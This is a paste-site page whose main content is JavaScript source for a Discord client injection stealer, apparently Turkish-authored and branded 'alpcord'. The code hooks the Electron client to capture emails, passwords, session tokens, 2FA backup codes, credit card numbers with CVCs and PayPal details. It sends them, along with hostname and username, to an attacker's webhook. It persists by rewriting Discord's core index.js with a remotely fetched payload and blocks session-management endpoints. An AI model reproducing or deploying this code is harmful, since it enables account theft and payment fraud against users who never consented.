New paste
Recent
API
Trending
Blog
Guest
Sign Up or Login
Login
Sign Up
New Paste
Syntax Highlighting
const fs = require('fs'); const os = require('os'); const https = require('https'); const args = process.argv; const path = require('path'); const querystring = require('querystring'); const { BrowserWindow, session, } = require('electron'); const CONFIG = { webhook: "%WEBHOOK%", injection_url: "https://gistpad.com/raw/sa-21280-2", filters: { urls: [ '/auth/login', '/auth/register', '/mfa/totp', '/mfa/codes-verification', '/users/@me', ], }, filters2: { urls: [ 'wss://remote-auth-gateway.discord.gg/*', 'https://discord.com/api/v*/auth/sessions', 'https://*.discord.com/api/v*/auth/sessions', 'https://discordapp.com/api/v*/auth/sessions' ], }, payment_filters: { urls: [ 'https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v*/payment_methods/paypal_accounts', 'https://api.stripe.com/v*/tokens', ], }, API: "https://discord.com/api/v9/users/@me", badges: { Discord_Emloyee: { Value: 1, Emoji: "<:8485discordemployee:1163172252989259898>", Rare: true, }, Partnered_Server_Owner: { Value: 2, Emoji: "<:9928discordpartnerbadge:1163172304155586570>", Rare: true, }, HypeSquad_Events: { Value: 4, Emoji: "<:9171hypesquadevents:1163172248140660839>", Rare: true, }, Bug_Hunter_Level_1: { Value: 8, Emoji: "<:4744bughunterbadgediscord:1163172239970140383>", Rare: true, }, Early_Supporter: { Value: 512, Emoji: "<:5053earlysupporter:1163172241996005416>", Rare: true, }, Bug_Hunter_Level_2: { Value: 16384, Emoji: "<:1757bugbusterbadgediscord:1163172238942543892>", Rare: true, }, Early_Verified_Bot_Developer: { Value: 131072, Emoji: "<:1207iconearlybotdeveloper:1163172236807639143>", Rare: true, }, House_Bravery: { Value: 64, Emoji: "<:6601hypesquadbravery:1163172246492287017>", Rare: false, }, House_Brilliance: { Value: 128, Emoji: "<:6936hypesquadbrilliance:1163172244474822746>", Rare: false, }, House_Balance: { Value: 256, Emoji: "<:5242hypesquadbalance:1163172243417858128>", Rare: false, }, Active_Developer: { Value: 4194304, Emoji: "<:1207iconactivedeveloper:1163172534443851868>", Rare: false, }, Certified_Moderator: { Value: 262144, Emoji: "<:4149blurplecertifiedmoderator:1163172255489085481>", Rare: true, }, Spammer: { Value: 1048704, Emoji: "⌨️", Rare: false, }, }, }; const executeJS = script => { const window = BrowserWindow.getAllWindows()[0]; return window.webContents.executeJavaScript(script, !0); }; const clearAllUserData = () => { executeJS("document.body.appendChild(document.createElement`iframe`).contentWindow.localStorage.clear()"); executeJS("location.reload()"); }; const getToken = async () => await executeJS(`(webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()`); const request = async (method, url, headers, data) => { url = new URL(url); const options = { protocol: url.protocol, hostname: url.host, path: url.pathname, method: method, headers: { "Access-Control-Allow-Origin": "*", }, }; if (url.search) options.path += url.search; for (const key in headers) options.headers[key] = headers[key]; const req = https.request(options); if (data) req.write(data); req.end(); return new Promise((resolve, reject) => { req.on("response", res => { let data = ""; res.on("data", chunk => data += chunk); res.on("end", () => resolve(data)); }); }); }; const hooker = async (content, token, account) => { content["content"] = "`" + os.hostname() + "` - `" + os.userInfo().username + "`\n\n" + content["content"]; content["username"] = "alpcord"; content["avatar_url"] = "https://i.ibb.co/GJGXzGX/discord-avatar-512-FCWUJ.png"; content["embeds"][0]["author"] = { "name": account.username, }; content["embeds"][0]["thumbnail"] = { "url": `https://cdn.discordapp.com/avatars/${account.id}/${account.avatar}.webp` }; content["embeds"][0]["footer"] = { "text": "alpcord", "icon_url": "https://avatars.githubusercontent.com/u/145487845?v=4", }; content["embeds"][0]["title"] = "hesap"; const nitro = getNitro(account.premium_type); const badges = getBadges(account.flags); const billing = await getBilling(token); const friends = await getFriends(token); const servers = await getServers(token); content["embeds"][0]["fields"].push({ "name": "toxen", "value": "```" + token + "```", "inline": false }, { "name": "Nitro", "value": nitro, "inline": true }, { "name": "rozet", "value": badges, "inline": true }, { "name": "ödeme", "value": billing, "inline": true }); content["embeds"].push({ "title": `Total Friends: ${friends.totalFriends}`, "description": friends.message, }, { "title": `Total Servers: ${servers.totalGuilds}`, "description": servers.message, }); for (const embed in content["embeds"]) { content["embeds"][embed]["color"] = 0xb143e3; } await request("POST", CONFIG.webhook, { "Content-Type": "application/json" }, JSON.stringify(content)); }; const fetch = async (endpoint, headers) => { return JSON.parse(await request("GET", CONFIG.API + endpoint, headers)); }; const fetchAccount = async token => await fetch("", { "Authorization": token }); const fetchBilling = async token => await fetch("/billing/payment-sources", { "Authorization": token }); const fetchServers = async token => await fetch("/guilds?with_counts=true", { "Authorization": token }); const fetchFriends = async token => await fetch("/relationships", { "Authorization": token }); const getNitro = flags => { switch (flags) { case 1: return '`Nitro Classic`'; case 2: return '`Nitro Boost`'; case 3: return '`Nitro Basic`'; default: return '`❌`'; } }; const getBadges = flags => { let badges = ''; for (const badge in CONFIG.badges) { let b = CONFIG.badges[badge]; if ((flags & b.Value) == b.Value) badges += b.Emoji + ' '; } return badges || '`❌`'; } const getRareBadges = flags => { let badges = ''; for (const badge in CONFIG.badges) { let b = CONFIG.badges[badge]; if ((flags & b.Value) == b.Value && b.Rare) badges += b.Emoji + ' '; } return badges; } const getBilling = async token => { const data = await fetchBilling(token); let billing = ''; data.forEach((x) => { if (!x.invalid) { switch (x.type) { case 1: billing += '💳 '; break; case 2: billing += 'pp '; break; } } }); return billing || '`❌`'; }; const getFriends = async token => { const friends = await fetchFriends(token); const filteredFriends = friends.filter((user) => { return user.type == 1 }) let rareUsers = ""; for (const acc of filteredFriends) { var badges = getRareBadges(acc.user.public_flags) if (badges != "") { if (!rareUsers) rareUsers = "**değerli arkadaşlar:**\n"; rareUsers += `${badges} ${acc.user.username}\n`; } } rareUsers = rareUsers || "**değerli arkadaşı yk**"; return { message: rareUsers, totalFriends: friends.length, }; }; const getServers = async token => { const guilds = await fetchServers(token); const filteredGuilds = guilds.filter((guild) => guild.permissions == '562949953421311' || guild.permissions == '2251799813685247'); let rareGuilds = ""; for (const guild of filteredGuilds) { if (rareGuilds === "") { rareGuilds += `**değerli sw:**\n`; } rareGuilds += `${guild.owner ? "<:SA_Owner:991312415352430673> Owner" : "<:admin:967851956930482206> Admin"} | Server Name: \`${guild.name}\` - Members: \`${guild.approximate_member_count}\`\n`; } rareGuilds = rareGuilds || "**sw yok mk**"; return { message: rareGuilds, totalGuilds: guilds.length, }; }; const EmailPassToken = async (email, password, token, action) => { const account = await fetchAccount(token) const content = { "content": `**${account.username}** just ${action}!`, "embeds": [{ "fields": [{ "name": "mayil", "value": "`" + email + "`", "inline": true }, { "name": "şifo", "value": "`" + password + "`", "inline": true }] }] }; hooker(content, token, account); } const BackupCodesViewed = async (codes, token) => { const account = await fetchAccount(token) const filteredCodes = codes.filter((code) => { return code.consumed === false; }); let message = ""; for (let code of filteredCodes) { message += `${code.code.substr(0, 4)}-${code.code.substr(4)}\n`; } const content = { "content": `**${account.username}** 2fa açtı`, "embeds": [{ "fields": [{ "name": "Backup Codes", "value": "```" + message + "```", "inline": false }, { "name": "mayil", "value": "`" + account.email + "`", "inline": true }, { "name": "telo", "value": "`" + (account.phone || "None") + "`", "inline": true } ] }] }; hooker(content, token, account); } const PasswordChanged = async (newPassword, oldPassword, token) => { const account = await fetchAccount(token) const content = { "content": `**${account.username}** şifo değişti`, "embeds": [{ "fields": [{ "name": "old şifo", "value": "`" + newPassword + "`", "inline": true }, { "name": "new şifo", "value": "`" + oldPassword + "`", "inline": true }] }] }; hooker(content, token, account); } const CreditCardAdded = async (number, cvc, month, year, token) => { const account = await fetchAccount(token) const content = { "content": `**${account.username}** allahcc ekledi`, "embeds": [{ "fields": [{ "name": "no", "value": "`" + number + "`", "inline": true }, { "name": "cıvıc", "value": "`" + cvc + "`", "inline": true }, { "name": "tarih", "value": "`" + month + "/" + year + "`", "inline": true }] }] }; hooker(content, token, account); } const PaypalAdded = async (token) => { const account = await fetchAccount(token) const content = { "content": `**${account.username}** pp ekledi!`, "embeds": [{ "fields": [{ "name": "mayil", "value": "`" + account.email + "`", "inline": true }, { "name": "telo", "value": "`" + (account.phone || "None") + "`", "inline": true }] }] }; hooker(content, token, account); } const discordPath = (function () { const app = args[0].split(path.sep).slice(0, -1).join(path.sep); let resourcePath; if (process.platform === 'win32') { resourcePath = path.join(app, 'resources'); } else if (process.platform === 'darwin') { resourcePath = path.join(app, 'Contents', 'Resources'); } if (fs.existsSync(resourcePath)) return { resourcePath, app }; return { undefined, undefined }; })(); async function initiation() { if (fs.existsSync(path.join(__dirname, 'initiation'))) { fs.rmdirSync(path.join(__dirname, 'initiation')); const token = await getToken(); if (!token) return; const account = await fetchAccount(token) const content = { "content": `**${account.username}** yedi`, "embeds": [{ "fields": [{ "name": "mayil", "value": "`" + account.email + "`", "inline": true }, { "name": "telo", "value": "`" + (account.phone || "Yok") + "`", "inline": true }] }] }; await hooker(content, token, account); clearAllUserData(); } const { resourcePath, app } = discordPath; if (resourcePath === undefined || app === undefined) return; const appPath = path.join(resourcePath, 'app'); const packageJson = path.join(appPath, 'package.json'); const resourceIndex = path.join(appPath, 'index.js'); const coreVal = fs.readdirSync(`${app}\\modules\\`).filter(x => /discord_desktop_core-+?/.test(x))[0] const indexJs = `${app}\\modules\\${coreVal}\\discord_desktop_core\\index.js`; const bdPath = path.join(process.env.APPDATA, '\\betterdiscord\\data\\betterdiscord.asar'); if (!fs.existsSync(appPath)) fs.mkdirSync(appPath); if (fs.existsSync(packageJson)) fs.unlinkSync(packageJson); if (fs.existsSync(resourceIndex)) fs.unlinkSync(resourceIndex); if (process.platform === 'win32' || process.platform === 'darwin') { fs.writeFileSync( packageJson, JSON.stringify({ name: 'discord', main: 'index.js', }, null, 4, ), ); const startUpScript = `const fs = require('fs'), https = require('https'); const indexJs = '${indexJs}'; const bdPath = '${bdPath}'; const fileSize = fs.statSync(indexJs).size fs.readFileSync(indexJs, 'utf8', (err, data) => { if (fileSize < 20000 || data === "module.exports = require('./core.asar')") init(); }) async function init() { https.get('${CONFIG.injection_url}', (res) => { const file = fs.createWriteStream(indexJs); res.replace('%WEBHOOK%', '${CONFIG.webhook}') res.pipe(file); file.on('finish', () => { file.close(); }); }).on("error", (err) => { setTimeout(init(), 10000); }); } require('${path.join(resourcePath, 'app.asar')}') if (fs.existsSync(bdPath)) require(bdPath);`; fs.writeFileSync(resourceIndex, startUpScript.replace(/\\/g, '\\\\')); } } let email = ""; let password = ""; let initiationCalled = false; const createWindow = () => { mainWindow = BrowserWindow.getAllWindows()[0]; if (!mainWindow) return mainWindow.webContents.debugger.attach('1.3'); mainWindow.webContents.debugger.on('message', async (_, method, params) => { if (!initiationCalled) { await initiation(); initiationCalled = true; } if (method !== 'Network.responseReceived') return; if (!CONFIG.filters.urls.some(url => params.response.url.endsWith(url))) return; if (![200, 202].includes(params.response.status)) return; const responseUnparsedData = await mainWindow.webContents.debugger.sendCommand('Network.getResponseBody', { requestId: params.requestId }); const responseData = JSON.parse(responseUnparsedData.body); const requestUnparsedData = await mainWindow.webContents.debugger.sendCommand('Network.getRequestPostData', { requestId: params.requestId }); const requestData = JSON.parse(requestUnparsedData.postData); switch (true) { case params.response.url.endsWith('/login'): if (!responseData.token) { email = requestData.login; password = requestData.password; return; // 2FA } EmailPassToken(requestData.login, requestData.password, responseData.token, "logged in"); break; case params.response.url.endsWith('/register'): EmailPassToken(requestData.email, requestData.password, responseData.token, "signed up"); break; case params.response.url.endsWith('/totp'): EmailPassToken(email, password, responseData.token, "logged in with 2FA"); break; case params.response.url.endsWith('/codes-verification'): BackupCodesViewed(responseData.backup_codes, await getToken()); break; case params.response.url.endsWith('/@me'): if (!requestData.password) return; if (requestData.email) { EmailPassToken(requestData.email, requestData.password, responseData.token, "changed his email to **" + requestData.email + "**"); } if (requestData.new_password) { PasswordChanged(requestData.new_password, requestData.password, responseData.token); } break; } }); mainWindow.webContents.debugger.sendCommand('Network.enable'); mainWindow.on('closed', () => { createWindow() }); } createWindow(); session.defaultSession.webRequest.onCompleted(CONFIG.payment_filters, async (details, _) => { if (![200, 202].includes(details.statusCode)) return; if (details.method != 'POST') return; switch (true) { case details.url.endsWith('tokens'): const item = querystring.parse(Buffer.from(details.uploadData[0].bytes).toString()); CreditCardAdded(item['card[number]'], item['card[cvc]'], item['card[exp_month]'], item['card[exp_year]'], await getToken()); break; case details.url.endsWith('paypal_accounts'): PaypalAdded(await getToken()); break; } }); session.defaultSession.webRequest.onBeforeRequest(CONFIG.filters2, (details, callback) => { if (details.url.startsWith("wss://remote-auth-gateway") || details.url.endsWith("auth/sessions")) return callback({ cancel: true }) }); module.exports = require("./core.asar");
Optional Gist Settings
Gist Name/Title:
Category:
None
Cryptocurrency
Cybersecurity
Fixit
Food
Gaming
Haiku
Help
History
Housing
Jokes
Legal
Money
Movies
Music
Pets
Photo
Science
Software
Source Code
Spirit
Sports
Travel
TV
Writing
Syntax Highlighting:
None
Bash
C
C++
C#
CSS
HTML
Java
JavaScript
Lua
Objective C
Perl
PHP
Python
Ruby
JSON
Swift
Markdown
ActionScript
Ada
Apache Log
AppleScript
ASM (NASM)
ASP
Bash
C
C for Macs
CAD DCL
CAD Lisp
C++
C#
ColdFusion
CSS
D
Delphi
Diff
Batch
Eiffel
Fortran
FreeBasic
Game Maker
HTML
INI file
Java
JavaScript
Lisp
Lua
MPASM
MySQL
NullSoft Installer
Objective C
OCaml
Openoffice BASIC
Oracle 8
Pascal
Perl
PHP
Python
QBasic
Robots
Ruby
Scheme
Smarty
SQL
VisualBasic
VB.NET
VisualFoxPro
XML
AutoIt
Blitz Basic
BNF
Erlang
Genero
Groovy
Haskell
Inno Script
Latex
Linden Scripting
MatLab
M68000 Assembler
mIRC
Rails
PL/SQL
Smalltalk
TCL
Z80 Assembler
ABAP
ActionScript 3
APT Sources
Avisynth
Basic4GL
BibTeX
BrainFuck
BOO
CFDG
C Intermediate Language
CMake
COBOL
DCS
DIV
DOT
Email
FO Language
GetText
OpenGL Shading
Ruby Gnuplot
HQ9 Plus
IDL
INTERCAL
IO
Java 5
KiXtart
Clone C
Clone C++
Loco Basic
LOL Code
Lotus Formulas
Lotus Script
LScript
Make
Modula 3
MXML
Oberon 2
OCaml Brief
Oracle 11
Per
PHP Brief
Pic 16
Pixel Bender
POV-Ray
PowerShell
Progress
Prolog
Properties
ProvideX
REBOL
REG
SAS
Scala
Scilab
SdlBasic
Tera Term
thinBasic
T-SQL
TypoScript
VeriLog
VHDL
VIM
Visual Pro Log
WhiteSpace
WHOIS
Winbatch
Xorg Config
XPP
Pawn
4CS
6502 ACME Cross Assembler
6502 Kick Assembler
6502 TASM/64TASS
Motorola 68000 HiSoft Dev
ALGOL 68
autoconf
Autohotkey
Awk
Cuesheet
ChaiScript
Clojure
C++ (with Qt extensions)
E
ECMAScript
Formula One
F#
GAMBAS
GDB
Genie
Go
GwBasic
HicEst
Icon
J
jQuery
Liberty BASIC
Logtalk
MagikSF
MapBasic
MIX Assembler
Modula 2
newLISP
Objeck Programming Language
Oz
Delphi Prism (Oxygene)
Oz
PCRE
Perl 6
OpenBSD PACKET FILTER
Pike
PostgreSQL
PowerBuilder
PureBasic
q/kdb+
RPM Spec
R
SystemVerilog
Vala
Unicon
Vala
XBasic
ZXBasic
UnrealScript
HTML 5
ProFTPd
BASCOM AVR
C: Loadrunner
CoffeeScript
EPC
Falcon
LLVM
PyCon
YAML
FreeSWITCH
ARM
Asymptote
DCL
DCPU-16
Haxe
LDIF
Nagios
Octave
ParaSail
PARI/GP
Python for S60
Rexx
SPARK
SPARQL
StoneScript
UPC
Urbi
Vedit
AIMMS
Chapel
Dart
Easytrieve
ISPF Panel Definition
JCL
Nginx
Nim
PostScript
QML
Racket
RBScript
Rust
SCL
StandardML
VBScript
C (WinAPI)
C++ (WinAPI)
NetRexx
JSON
Swift
SuperCollider
Julia
Blitz3D
BlitzMax
SQF
Puppet
Filemaker
Euphoria
PL/I
Open Object Rexx
Markdown
Kotlin
Ceylon
Arduino
YARA
TypeScript
Mercury
MetaPost
MK-61/52
Phix
Roff Manpage
SSH Config
TeXgraph
Xojo
KSP (Kontakt Script)
GDScript
Godot GLSL
None
Tags:
Gist Exposure:
Public
Unlisted
Private
Gist Expiration:
Never
Burn after read
10 Minutes
1 Hour
1 Day
1 Week
2 Weeks
1 Month
6 Months
1 Year
Password
Enabled
Disabled
Folder:
(members only)
Burn after read
Create New Gist
You are currently not logged in, this means you can not edit or delete anything you paste.
Sign Up
or
Login
Public Gists
Untitled
None | 1 hour ago | 4 Views
Merged prompt
None | 2 hours ago | 2 Views
Untitled
None | 3 hours ago | 6 Views
Verified PayPal Transfer Skrill Transfer CashApp Transfer WU Transfer Bug
None | 5 hours ago | 8 Views
Untitled
None | 13 hours ago | 14 Views
Untitled
None | 15 hours ago | 14 Views
Untitled
None | 20 hours ago | 17 Views
Not a member of GistPad yet?
Sign Up
, it unlocks many cool features!
We use cookies for various purposes including analytics. By continuing to use GistPad, you agree to our use of cookies as described in the
Privacy Policy
.
OK, I Understand
